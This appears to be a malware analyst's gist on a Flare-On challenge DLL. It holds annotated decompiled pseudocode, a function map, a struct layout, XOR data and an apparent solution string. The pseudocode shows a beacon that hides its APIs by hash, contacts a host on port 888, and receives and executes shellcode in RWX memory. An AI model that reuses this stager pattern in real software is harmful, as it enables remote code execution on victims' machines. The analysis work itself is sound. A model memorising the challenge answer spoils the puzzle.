@hasherezade
Last active September 15, 2021 21:26
// Analyst notes: Hex-Rays pseudocode, not compilable source.
// Sends a one-byte "#" marker on socket1, reads up to 512 bytes into a stack
// buffer, copies them into a fresh executable allocation and transfers control
// to it. Every API is resolved at run time through load_func_by_hash(), so none
// of the names below appear in the binary's import table.
// Returns recv's result when it is <= 0; otherwise the function ends in an
// indirect call through shellc_buf and does not return normally.
__int64 __fastcall beacon_to_receive_shellcode(__int64 socket1)
{
__int64 (__fastcall *lstrlenA)(char *); // rax
__int64 len1; // rax
__int64 _len1; // rdi
unsigned int (__fastcall *send)(__int64, char *, __int64, _QWORD, __int64, __int64); // rax
void (__fastcall *closesocket)(__int64); // rax
_BYTE *shellc_buf; // rax -- also holds the WSACleanup pointer on the send-failure branch
_BYTE *_shellc_buf; // rdx
__int64 next_chunk; // rcx
__int64 (__fastcall *recv)(__int64, char *, __int64, _QWORD); // rax
__int64 size_received; // rax
int index; // ebx
__int64 (__fastcall *VirtualAlloc)(_QWORD, __int64, __int64, __int64); // rax
__int64 v14; // [rsp+20h] [rbp-228h] BYREF
__int64 v15; // [rsp+28h] [rbp-220h] BYREF
char received_buf[512]; // [rsp+30h] [rbp-218h] BYREF
// v14/v15 each hold the 1-byte string "#" at offset +4: the high dword is
// 35 == '#' followed by three zero bytes.
LOBYTE(v14) = 0;
HIDWORD(v14) = 35;
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
len1 = lstrlenA((char *)&v14 + 4); // == 1
LOBYTE(v15) = 0;
_len1 = len1;
HIDWORD(v15) = 35;
send = (unsigned int (__fastcall *)(__int64, char *, __int64, _QWORD, __int64, __int64))load_func_by_hash(
0i64,
4u,
0xE797764u);
if ( send(socket1, (char *)&v15 + 4, _len1, 0i64, v14, v15) == -1 ) // send("#", 1); the trailing v14/v15 arguments look like a decompiler artifact of the 4-argument send()
{
closesocket = (void (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x939D7D9C);
closesocket(socket1);
shellc_buf = (_BYTE *)load_func_by_hash(0i64, 4u, 0x8FB8B5BD);// WSACleanup -- the indirect call at the end of the function invokes it on this branch
}
else
{
recv = (__int64 (__fastcall *)(__int64, char *, __int64, _QWORD))load_func_by_hash(0i64, 4u, 0xE5971F6u);
size_received = recv(socket1, received_buf, 512i64, 0i64);
index = size_received;
if ( (int)size_received <= 0 )
return size_received; // socket error or peer closed: nothing to run
// 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE: the
// received bytes are staged directly into executable memory.
VirtualAlloc = (__int64 (__fastcall *)(_QWORD, __int64, __int64, __int64))load_func_by_hash(0i64, 1u, 0x697A6AFEu);
shellc_buf = (_BYTE *)VirtualAlloc(0i64, 512i64, 0x3000i64, 64i64);
if ( shellc_buf )
{
// Byte-wise copy of received_buf[0..index) into shellc_buf; the index
// expression is how the decompiler rendered "received_buf[k]".
_shellc_buf = shellc_buf;
do
{
next_chunk = (unsigned __int8)_shellc_buf[received_buf - shellc_buf];
*_shellc_buf++ = next_chunk;
--index;
}
while ( index );
}
// No NULL check: if VirtualAlloc failed, shellc_buf is 0 and the call
// below goes through a null pointer.
}
return ((__int64 (__fastcall *)(__int64, _BYTE *))shellc_buf)(); // execute the received bytes in place
}
// Analyst notes: Hex-Rays pseudocode, not compilable source.
// Opens a TCP socket (2 = AF_INET, 1 = SOCK_STREAM, 6 = IPPROTO_TCP), resolves
// "<struct1->formatStr>.<struct1->hostAddr>" with gethostbyname, connects to
// port 888, sends a one-byte "@" and reads up to 32 bytes into
// struct1->bufReceived. The reply is prefix-compared against three strings
// decoded on the stack and dispatched: "exe" -> beacon_to_receive_shellcode,
// "run" -> to_recv_0, "flare-on.com" -> keep the socket in struct1->mySocket.
// Returns 1 when the socket is kept open in struct1->mySocket, 0 otherwise.
// closesocket is only reached from the gethostbyname/connect/send failures
// (LABEL_6); a negative to_recv result falls through to "return 0" with the
// socket still open.
char __fastcall communicate_over_socket(my_struct *struct1)
{
__int64 (__fastcall *socket)(__int64, __int64, __int64); // rax
SOCKET socket1; // rsi
char result; // al
unsigned __int64 v5; // rdi
unsigned __int64 i; // rcx
__int64 (__fastcall *gethostbyname)(char *); // rax
hostent *host_val; // rax
void (__fastcall *closesocket)(SOCKET); // rax
__int64 (__fastcall *htons)(__int64); // rax
unsigned int (__fastcall *connect)(SOCKET, sockaddr_in *, __int64); // rax
__int64 (__fastcall *lstrlenA)(char *); // rax
__int64 v13; // rax
__int64 v14; // rbx
unsigned int (__fastcall *send)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64); // rax
BYTE *curr_indx; // rbx
int v17; // eax
BYTE *buf_rec; // rcx
BYTE buf_bound; // dl
BYTE *v20; // rcx
unsigned __int8 v21; // dl
signed __int64 v22; // r8
__int64 v23; // rdx
BYTE v24; // cl
char v25[8]; // [rsp+20h] [rbp-69h] BYREF
__int64 v26; // [rsp+28h] [rbp-61h] BYREF
char v27; // [rsp+30h] [rbp-59h]
int extension; // [rsp+34h] [rbp-55h] BYREF
char v29; // [rsp+38h] [rbp-51h]
char v30[8]; // [rsp+3Ch] [rbp-4Dh] BYREF
int formatstr_s_s[3]; // [rsp+44h] [rbp-45h] BYREF
char v32; // [rsp+50h] [rbp-39h]
int v33[5]; // [rsp+54h] [rbp-35h] BYREF
sockaddr_in sock_addr1; // [rsp+68h] [rbp-21h] BYREF
char full_host[64]; // [rsp+80h] [rbp-9h] BYREF
socket = (__int64 (__fastcall *)(__int64, __int64, __int64))load_func_by_hash(0i64, 4u, 0xFC7AF16A);
socket1 = socket(2i64, 1i64, 6i64); // AF_INET, SOCK_STREAM, IPPROTO_TCP
if ( socket1 == -1i64 )
return 0;
sock_addr1.sin_family = 2; // AF_INET
v30[4] = 0;
// Two dwords XOR-decoded in place to the format string "%s.%s".
formatstr_s_s[0] = 0x38B2F282;
formatstr_s_s[1] = 0x1D9C81D4;
v5 = 0i64;
for ( i = 0i64; i < 2; ++i )
formatstr_s_s[i] ^= 0x1D9C81A7u; // "%s.%s"
to_wvsprintfA(full_host, formatstr_s_s, struct1->formatStr, struct1->hostAddr); // full_host = "<formatStr>.<hostAddr>", 64-byte buffer
gethostbyname = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 4u, 0xF44318C6);
host_val = (hostent *)gethostbyname(full_host);
if ( !host_val )
goto LABEL_6;
memmove(&sock_addr1.sin_addr, *(const void **)host_val->h_addr_list, host_val->h_length); // first resolved address; h_length is not checked against the 4-byte sin_addr
htons = (__int64 (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x8E9BF775);
sock_addr1.sin_port = htons(888i64); // port = 888
connect = (unsigned int (__fastcall *)(SOCKET, sockaddr_in *, __int64))load_func_by_hash(0i64, 4u, 0xEDD8FE8A);
if ( connect(socket1, &sock_addr1, 16i64) == -1 ) // 16 == sizeof(sockaddr_in)
goto LABEL_6;
// v25/v26 hold the 1-byte string "@" at offset +4 (same construction as the
// "#" marker in beacon_to_receive_shellcode).
v25[0] = 0;
*(_DWORD *)&v25['\x04'] = '@';
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
v13 = lstrlenA(&v25[4]); // == 1
LOBYTE(v26) = 0;
v14 = v13;
HIDWORD(v26) = '@';
send = (unsigned int (__fastcall *)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64))load_func_by_hash(
0i64,
4u,
0xE797764u);
if ( send(socket1, (char *)&v26 + 4, v14, 0i64, *(_QWORD *)v25, v26) == -1 ) // send("@", 1); the trailing arguments look like a decompiler artifact of the 4-argument send()
{
LABEL_6:
closesocket = (void (__fastcall *)(SOCKET))load_func_by_hash(0i64, 4u, 0x939D7D9C);
closesocket(socket1);
}
else
{
curr_indx = struct1->bufReceived;
v17 = to_recv(socket1, (__int64)struct1->bufReceived, 32u); // wrapper around recv; presumably returns the byte count, defined elsewhere
if ( v17 <= 0 )
{
if ( !v17 )
{
// Empty reply: the socket is kept, same outcome as the "flare-on.com" branch below.
result = 1;
struct1->mySocket = socket1;
return result;
}
}
else
{
v27 = 0;
strcpy((char *)&extension, "exe"); // "exe"
// The "struct1 != (my_struct *)-448" tests are NULL checks on
// &struct1->bufReceived: with natural alignment bufReceived sits at
// offset 448 of _my_struct (see the structure at the end of this page).
if ( struct1 != (my_struct *)-448i64 )
{
buf_rec = struct1->bufReceived;
// Byte-wise compare of bufReceived[0..3) with "exe"; only the prefix is
// checked, no terminator.
while ( 1 )
{
buf_bound = buf_rec[(char *)&extension - (char *)curr_indx]; // == ((char *)&extension)[k]
if ( *buf_rec < buf_bound || *buf_rec > buf_bound )
break;
if ( (unsigned __int64)(++buf_rec - curr_indx) >= 3 )
{
beacon_to_receive_shellcode(socket1); // reply "exe": fetch and run a second stage
return 0;
}
}
}
v29 = 0;
strcpy(v30, "run"); // "run"
if ( struct1 != (my_struct *)-448i64 )
{
v20 = struct1->bufReceived;
// Same 3-byte prefix compare against "run".
while ( 1 )
{
v21 = v20[v30 - (char *)curr_indx];
if ( *v20 < v21 || *v20 > v21 )
break;
if ( (unsigned __int64)(++v20 - curr_indx) >= 3 )
{
to_recv_0(socket1); // reply "run"
return 0;
}
}
}
v32 = 0;
v33[0] = 0x6E5AC0F;
v33[1] = 0x1AEBED0C;
v33[2] = 0x19EBA347;
v33[3] = 0x7484C069;
do
v33[v5++] ^= 0x7484C069u; // XOR-decodes to "flare-on.com" followed by a zero dword; 12 bytes, matching the 0xC compare length below
while ( v5 < 4 );
if ( struct1 != (my_struct *)-448i64 )
{
v22 = (char *)v33 - (char *)curr_indx;
v23 = -(__int64)curr_indx;
// 12-byte compare of bufReceived with the decoded string; v22/v23 are the
// decompiler's way of indexing v33 and counting iterations.
while ( 1 )
{
v24 = curr_indx[v22];
if ( *curr_indx < v24 || *curr_indx > v24 )
break;
++curr_indx;
if ( (unsigned __int64)&curr_indx[v23] >= 0xC )
{
// Reply "flare-on.com": keep the connection for later use.
result = 1;
struct1->mySocket = socket1;
return result;
}
}
}
}
}
return 0; // no match or negative to_recv result: socket1 is left open here
}
// Analyst notes: Hex-Rays pseudocode, not compilable source.
// Derives a value from two 16-byte globals: reg_key0 is a copy of g_xorData1,
// reg_key1 of g_xorData2. Selected bytes are XORed with bytes taken from
// struct_1->decryptedStr at fixed positions (the case -> index table below),
// then the result is handed to set_registry_key as a NUL-terminated string.
// Always returns 0.
// v2..v12 are plain copies of reg_key0[0..6] and reg_key1[13..15] that the
// decompiler tracked in registers; they are written back after the loop.
// reg_key1 and reg_key0 are adjacent on the stack (rbp-28h / rbp-18h), so
// lstrlenA(&reg_key1) measures the combined 32-byte buffer up to its first
// zero byte -- presumably the whole decoded value; confirm in the binary.
__int64 __fastcall decode_and_set_keys(my_struct *struct_1)
{
__int8 v2; // r8
unsigned int index; // edx
__int8 v4; // r9
__int8 v5; // r10
__int8 v6; // r11
__int8 v7; // di
__int8 v8; // si
__int8 v9; // r14
__int8 v10; // r15
__int8 v11; // r12
__int8 v12; // r13
__int64 (__fastcall *lstrlenA)(__m128i *); // rax
int reg_len; // eax
int v16; // [rsp+24h] [rbp-2Ch] BYREF
__m128i reg_key1; // [rsp+28h] [rbp-28h] BYREF
__m128i reg_key0; // [rsp+38h] [rbp-18h]
reg_key0 = _mm_load_si128(&g_xorData1);
v2 = reg_key0.m128i_i8[6];
index = 0;
v4 = reg_key0.m128i_i8[5];
v5 = reg_key0.m128i_i8[4];
v6 = reg_key0.m128i_i8[3];
v7 = reg_key0.m128i_i8[2];
v8 = reg_key0.m128i_i8[1];
v9 = reg_key0.m128i_i8[0];
reg_key1 = _mm_load_si128(&g_xorData2);
v10 = reg_key1.m128i_i8[15];
v11 = reg_key1.m128i_i8[14];
v12 = reg_key1.m128i_i8[13];
// index runs 0..31 but only cases 0..0x16 do any work. Note that
// decryptedStr[14] (cases 2 and 5) and decryptedStr[10] (cases 0x10 and
// 0x15) are each used twice.
do
{
switch ( index )
{
case 0u:
reg_key1.m128i_i8[0] ^= struct_1->decryptedStr[20];
break;
case 1u:
reg_key1.m128i_i8[1] ^= struct_1->decryptedStr[21];
break;
case 2u:
reg_key1.m128i_i8[2] ^= struct_1->decryptedStr[14];
break;
case 3u:
reg_key1.m128i_i8[3] ^= struct_1->decryptedStr[16];
break;
case 4u:
reg_key1.m128i_i8[4] ^= struct_1->decryptedStr[15];
break;
case 5u:
reg_key1.m128i_i8[5] ^= struct_1->decryptedStr[14];
break;
case 6u:
reg_key1.m128i_i8[6] ^= struct_1->decryptedStr[13];
break;
case 7u:
reg_key1.m128i_i8[7] ^= struct_1->decryptedStr[9];
break;
case 8u:
reg_key1.m128i_i8[8] ^= struct_1->decryptedStr[8];
break;
case 9u:
reg_key1.m128i_i8[9] ^= struct_1->decryptedStr[11];
break;
case 0xAu:
reg_key1.m128i_i8[10] ^= struct_1->decryptedStr[12];
break;
case 0xBu:
reg_key1.m128i_i8[11] ^= struct_1->decryptedStr[25];
break;
case 0xCu:
reg_key1.m128i_i8[12] ^= struct_1->decryptedStr[23];
break;
case 0xDu:
v12 ^= struct_1->decryptedStr[28]; // reg_key1[13]
break;
case 0xEu:
v11 ^= struct_1->decryptedStr[27]; // reg_key1[14]
break;
case 0xFu:
v10 ^= struct_1->decryptedStr[29]; // reg_key1[15]
break;
case 0x10u:
v9 ^= struct_1->decryptedStr[10]; // reg_key0[0]
break;
case 0x11u:
v8 ^= struct_1->decryptedStr[18]; // reg_key0[1]
break;
case 0x12u:
v7 ^= struct_1->decryptedStr[24]; // reg_key0[2]
break;
case 0x13u:
v6 ^= struct_1->decryptedStr[19]; // reg_key0[3]
break;
case 0x14u:
v5 ^= struct_1->decryptedStr[22]; // reg_key0[4]
break;
case 0x15u:
v4 ^= struct_1->decryptedStr[10]; // reg_key0[5]
break;
case 0x16u:
v2 ^= '@'; // reg_key0[6] ^= 0x40, a constant rather than a decryptedStr byte
break;
default:
break;
}
++index;
}
while ( index < 32 );
// Write the register-held bytes back into the XMM locals.
reg_key0.m128i_i8[6] = v2;
reg_key0.m128i_i8[5] = v4;
reg_key0.m128i_i8[4] = v5;
reg_key0.m128i_i8[3] = v6;
reg_key0.m128i_i8[2] = v7;
reg_key0.m128i_i8[1] = v8;
reg_key0.m128i_i8[0] = v9;
reg_key1.m128i_i8[15] = v10;
reg_key1.m128i_i8[14] = v11;
reg_key1.m128i_i8[13] = v12;
v16 = 48; // passed by address as the last argument; its meaning is not evident here
lstrlenA = (__int64 (__fastcall *)(__m128i *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
reg_len = lstrlenA(&reg_key1);
set_registry_key(struct_1, (__int64)&reg_key1, reg_len + 1, (__int64)&v16); // size includes the terminating NUL
return 0i64;
}
l3rlcps_7r_vb33eehskc3
1000;DllMain
1010;Start
1020;check_dll
1120;func_load_checks
1210;fetch_new_dll_names
12c0;load_func_by_hash
1370;to_load_func_by_hash
1380;initialize_dll_names
18e0;sub_1800018E0
1990;_Start
1a40;to_png_and_socket
1e60;init_inactive_strings
1f80;to_communicate_over_socket
2070;communicate_over_socket
2410;beacon_to_receive_shellcode
2590;on_command_run
2730;decode_and_set_keys
2a20;set_registry_key
2ce0;to_recv
2d30;to_wvsprintfA
2d80;get_system_date_format
2e60;to_name_check
2f70;maybe_aes_stuff
33e0;__security_check_cookie
3404;dllmain_crt_dispatch
3454;dllmain_crt_process_attach
3580;dllmain_crt_process_detach
3604;dllmain_dispatch
36fc;dllmain_raw
3750;section:_[.text]
3790;__raise_securityfailure
37c4;__report_gsfailure
3898;__report_rangecheckfailure
38ac;__report_securityfailure
3948;capture_current_context
39b8;capture_previous_context
3a2c;__scrt_acquire_startup_lock
3a68;__scrt_dllmain_after_initialize_c
3a9c;__scrt_dllmain_before_initialize_c
3ab4;anti_vm
3adc;__scrt_dllmain_crt_thread_detach
3af4;__scrt_dllmain_exception_filter
3b58;__scrt_dllmain_uninitialize_c
3b88;__scrt_dllmain_uninitialize_critical
3b9c;__scrt_initialize_crt
3be8;__scrt_initialize_onexit_tables
3cb4;__scrt_is_nonwritable_in_current_image
3d50;__scrt_release_startup_lock
3d74;__scrt_uninitialize_crt
3da0;_onexit
3df0;atexit
3e08;__security_init_cookie
3eb4;_InitializeSListHead
3ec4;sub_180003EC4
3ed0;sub_180003ED0
3ed8;sub_180003ED8
3ee0;__scrt_initialize_default_local_stdio_options
3efc;sub_180003EFC
3f04;sub_180003F04
3f0c;__scrt_fastfail
4054;_RTC_Initialize_0
40a0;_RTC_Initialize_0_0
40ec;j__guard_check_icall_nop
40f4;__isa_available_init
42bc;__uncaught_exception
42d0;strrchr
4410;__C_specific_handler
460c;__vcrt_initialize
4640;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores
4654;__vcrt_thread_detach
4668;__vcrt_uninitialize
4688;__vcrt_uninitialize_critical
4698;__std_type_info_destroy_list
46e0;memset
4890;_local_unwind
48c0;_NLG_Notify
48f0;__NLG_Return2
48f4;_guard_check_icall_nop
48f8;__vcrt_freefls
4918;__vcrt_freeptd
4968;__vcrt_getptd_noexit
4a20;__vcrt_initialize_ptd
4a60;__vcrt_uninitialize_ptd
4a84;__vcrt_initialize_locks
4acc;__vcrt_uninitialize_locks
4b04;try_get_function
4ccc;__vcrt_FlsAlloc
4d20;__vcrt_FlsFree
4d74;__vcrt_FlsGetValue
4dc8;__vcrt_FlsSetValue
4e30;__vcrt_InitializeCriticalSectionEx
4ea8;__vcrt_initialize_winapi_thunks
4ef4;__vcrt_uninitialize_winapi_thunks
4f34;__vcrt_initialize_pure_virtual_call_handler
4f58;__crt_strtox::is_overflow_condition_ulong_
4f84;unknown_libname_10
4f98;__crt_strtox::parse_integer_ulong
52ac;_LocaleUpdate::_LocaleUpdate
533c;_wtol
5368;j__malloc_base
5370;strnlen
54cc;strncpy_s
55a0;_initterm
5618;_initterm_e
5664;_seh_filter_dll
5678;_seh_filter_exe
5808;dyntls_init_exception_filter
5814;common_exit
5980;exit_or_terminate_process
59cc;try_cor_exit_process
5a38;sub_180005A38
5a40;_cexit
5a50;_exit
5a5c;sub_180005A5C
5a64;parse_command_line_char_
5c20;__acrt_allocate_buffer_for_argv
5c84;_configure_narrow_argv
5dfc;common_initialize_environment_nolock_char_
5e68;create_environment_char_
5f64;unknown_libname_11
5fa8;sub_180005FA8
5fc4;sub_180005FC4
5fe0;__dcrt_uninitialize_environments_nolock
6018;common_initialize_environment_nolock<char>
6020;__crt_seh_guarded_call_int_::operator
605c;__crt_seh_guarded_call<int>::operator
61fc;_lambda_4e60a939b0d047cfe11ddc22648dfba9_::operator
63d8;sub_1800063D8
63e8;_execute_onexit_table
6424;_initialize_onexit_table
6464;_register_onexit_function
64ac;initialize_global_variables
64c0;initialize_c
64e4;__vcrt_uninitialize_critical_0
64f4;initialize_pointers
6548;sub_180006548
6550;uninitialize_allocated_memory
65e0;sub_1800065E0
65e4;__acrt_initialize
65f8;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores
660c;__vcrt_uninitialize_critical_1
661c;__acrt_uninitialize
6630;__vcrt_uninitialize_critical_2
6640;terminate
6668;_free_base
66a8;_malloc_base
6708;strcpy_s
6768;abort
67c0;_calloc_base
6838;__acrt_call_reportfault
6994;sub_180006994
699c;_invalid_parameter
6a44;_invalid_parameter_noinfo
6a64;_invoke_watson
6aac;__acrt_errno_from_os_error
6af4;__acrt_errno_map_os_error
6b44;__doserrno
6b64;_errno
6b84;__pctype_func
6bb4;_isctype_l
6cc4;__crt_seh_guarded_call_void_::operator
6d24;__crt_seh_guarded_call<void>::operator
6d6c;__crt_seh_guarded_call<void>::operator
6dac;__crt_seh_guarded_call<void>::operator
6dec;construct_ptd_array
6ebc;Concurrency::details::SchedulerProxy::DeleteThis
6edc;destroy_ptd_array
6fd4;replace_current_thread_locale_nolock
703c;__acrt_freeptd
7080;__acrt_getptd
7114;__acrt_getptd_noexit
71b4;__acrt_initialize_ptd
71f0;__vcrt_uninitialize_ptd_0
7214;__acrt_update_locale_info
7248;__acrt_update_locale_info_0
727c;__acrt_set_locale_changed
7288;__acrt_uninitialize_locale
72d0;__vcrt_initialize_locks_0
7318;sub_180007318
7334;__vcrt_uninitialize_locks_0
736c;sub_18000736C
7388;try_get_function
7528;__acrt_FlsAlloc
7580;__acrt_FlsFree
75d8;__vcrt_FlsFree_0
7630;__acrt_FlsSetValue
7698;__acrt_InitializeCriticalSectionEx
7710;__acrt_LCMapStringEx
7800;__acrt_LocaleNameToLCID
7868;__acrt_initialize_winapi_thunks
78a0;__acrt_is_packaged_app
7928;__acrt_uninitialize_winapi_thunks
796c;unknown_libname_12
7980;common_expand_argv_wildcards_char_
7b8c;copy_and_add_argument_to_buffer_char_
7c9c;expand_argument_wildcards_char_
7e48;unknown_libname_13
7f10;common_expand_argv_wildcards<char>
7f18;__crt_seh_guarded_call<void>::operator
7f50;_lambda_ad1ced32f4ac17aa236e5ef05d6b3b7c_::operator
8168;getSystemCP
81e8;setSBCS
8278;setSBUpLow
845c;setmbcp_internal
8614;__acrt_initialize_multibyte
863c;__acrt_update_thread_multibyte_data
86fc;_setmbcp_nolock
89a4;x_ismbbtype_l
8a1c;_ismbblead
8a30;__acrt_initialize_command_line
8a58;__dcrt_get_narrow_environment_from_os
8b5c;j__recalloc_base
8b64;_recalloc_base
8bfc;__acrt_initialize_heap
8c18;sub_180008C18
8c24;initialize_inherited_file_handles_nolock
8d10;initialize_stdio_handles_nolock
8e0c;__acrt_initialize_lowio
8e48;__acrt_uninitialize_lowio
8e88;__acrt_execute_initializers
8f1c;__acrt_execute_uninitializers
8f6c;sub_180008F6C
8f74;_callnewh
8fb4;_query_new_handler
8fe8;__crt_seh_guarded_call_void
9030;__acrt_get_sigabrt_handler
9060;_initp_misc_winsig
9080;raise
931c;__acrt_has_user_matherr
933c;sub_18000933C
9344;__acrt_invoke_user_matherr
938c;sub_18000938C
9394;_mbtowc_l
94dc;mbtowc
94e4;_fileno
950c;__acrt_initialize_stdio
962c;__acrt_uninitialize_stdio
9688;sub_180009688
9694;sub_180009694
96a0;_isleadbyte_l
96e0;__acrt_GetStringTypeA
9894;__acrt_add_locale_ref
9920;__acrt_free_locale
9ac0;__acrt_locale_free_lc_time_if_unreferenced
9af8;__acrt_locale_release_lc_time_reference
9b20;__acrt_release_locale_ref
9bc8;__acrt_update_thread_locale_data
9c38;_updatetlocinfoEx_nolock
9ca0;__free_lconv_mon
9dac;__free_lconv_num
9e18;free_crt_array_internal
9e70;__acrt_locale_free_time
9f78;GetTableIndexFromLocaleName
a040;__crtDownlevelLocaleNameToLCID
a080;shortsort
a150;qsort
a484;unknown_libname_14
a524;_mbsdec
a52c;_mbsdec_l
a5c4;initialize_multibyte
a5dc;__acrt_LCMapStringA_stat
a938;__acrt_LCMapStringA
a9d0;_msize
aa0c;_realloc_base
aa90;__acrt_lowio_create_handle_array
ab28;__acrt_lowio_destroy_handle_array
ab78;__acrt_lowio_ensure_fh_exists
ac30;__acrt_lowio_unlock_fh_0
ac54;__acrt_lowio_unlock_fh_0_0
ac78;_free_osfhnd
ad34;_get_osfhandle
adac;_isatty
ae0c;__acrt_stdio_flush_nolock
ae84;_fflush_nolock
aed0;_flushall
aedc;common_flush_all
afc0;_fcloseall
b074;__acrt_stdio_free_buffer_nolock
b0b4;__strncnt
b0cc;sub_18000B0CC
b0d4;__crt_seh_guarded_call<int>::operator
b160;_commit
b1f4;write_double_translated_ansi_nolock
b3fc;write_text_ansi_nolock
b504;write_text_utf16le_nolock
b620;write_text_utf8_nolock
b794;_write
b880;_write_nolock
bb70;log10
c11c;common_lseek_nolock___int64_
c1b8;common_lseek_nolock<__int64>
c1c0;_fclose_nolock
c244;ftell
c2b0;_putwch_nolock
c30c;_call_matherr
c374;_exception_enabled
c430;_handle_error
c560;__acrt_initialize_fma3
c5d0;_log10_special
c5f0;_log_special_common
c688;__crt_seh_guarded_call<int>::operator
c6fc;_close
c7a0;_close_nolock
c85c;__acrt_stdio_free_stream
c8a0;__dcrt_lowio_initialize_console_output
c8dc;__dcrt_terminate_console_output
c910;_get_fpsr
c920;_set_fpsr
c92a;_fclrf
c95c;_return
c960;_raise_exc
c988;_raise_exc_ex
cc90;_set_errno_from_matherr
ccc0;_clrfp
cce0;_ctrlfp
cd5c;_set_statfp
cd7c;_statfp
cd8e;IsProcessorFeaturePresent
cd94;RtlUnwindEx
cda0;_FindPESection
cdf0;_IsNonwritableInCurrentImage
ce40;_ValidateImageBase
ce70;__GSHandlerCheck
ce90;__GSHandlerCheckCommon
cf00;_alloca_probe
cf70;memmove
d3c0;memcmp
d4a0;_guard_dispatch_icall_nop
structure:
// Analyst-recovered layout of the beacon's context object; field names are the
// analyst's. Only the members referenced in the pseudocode above are annotated.
struct _my_struct
{
char currentDateStr[12];
BYTE someData[11];
QWORD resourceBin;
DWORD resourceSize;
DWORD roundId;
char processName[261];
char formatStr[34]; // first "%s" of the "%s.%s" host name built in communicate_over_socket
BOOL isWow64;
DWORD connAttempts;
DWORD unknown0;
QWORD padding1[4];
DWORD wow64Flag;
char *hostAddr; // second "%s" of that host name
DWORD timeout;
DWORD unk;
SOCKET mySocket; // set by communicate_over_socket when the connection is kept open
BYTE decryptedStr[32]; // source bytes for the XOR operations in decode_and_set_keys
BYTE bufReceived[32]; // reply buffer (32 bytes read by to_recv); with natural alignment this lands at offset 448 (0x1C0), which explains the "(my_struct *)-448" NULL checks in communicate_over_socket
};
C3 C1 A8 06 C2 96 33 00 00 00 00 00 00 00 00 00 8A 1D 89 15 14 9F C1 1D 99 7E 8A 1B 00 00 00 00
E2 A4 B7 A7 D7 AC 87 8D 9B 9C 85 0D D8 8E E5 FA